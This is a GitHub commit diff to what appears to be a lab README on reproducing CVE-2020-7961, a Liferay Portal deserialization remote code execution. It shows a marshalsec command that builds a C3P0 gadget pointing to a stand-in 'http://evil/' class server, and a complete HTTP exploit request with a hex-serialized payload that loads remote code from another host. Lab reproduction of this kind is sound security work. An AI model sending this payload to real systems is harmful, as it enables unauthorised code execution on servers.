Skip to content

Commit

Permalink
complete README manual
Browse files Browse the repository at this point in the history
  • Loading branch information
phith0n committed Apr 23, 2020
1 parent cf29bb4 commit d384bd0
Show file tree
Hide file tree
Showing 2 changed files with 9 additions and 3 deletions.
Binary file added liferay-portal/CVE-2020-7961/3.png
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
12 changes: 9 additions & 3 deletions liferay-portal/CVE-2020-7961/README.md
Expand Up @@ -49,13 +49,13 @@ Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

我们使用利用链是com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,借助[marshalsec](https://github.com/mbechler/marshalsec)来生成一个Jackson的POC
因为目标Java版本较高,我们使用利用链是com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,借助[marshalsec](https://github.com/mbechler/marshalsec)来生成一个适用于Jackson的POC

```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://evil/ LifExp
```

其中,`http://evil/`是保存了恶意class文件的Web服务,LifExp是恶意类名。
其中,`http://evil/`是刚才启动的保存了恶意class文件的Web服务,LifExp是恶意类名。

![](1.png)

Expand All @@ -75,4 +75,10 @@ Content-Type: application/x-www-form-urlencoded
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c6966457870740017687474703a2f2f3137322e31372e302e313a383030302f740003466f6f;"}
```
```

![](2.png)

进入容器中查看,发现已经成功执行`touch /tmp/success`

![](3.png)

0 comments on commit d384bd0

Please sign in to comment.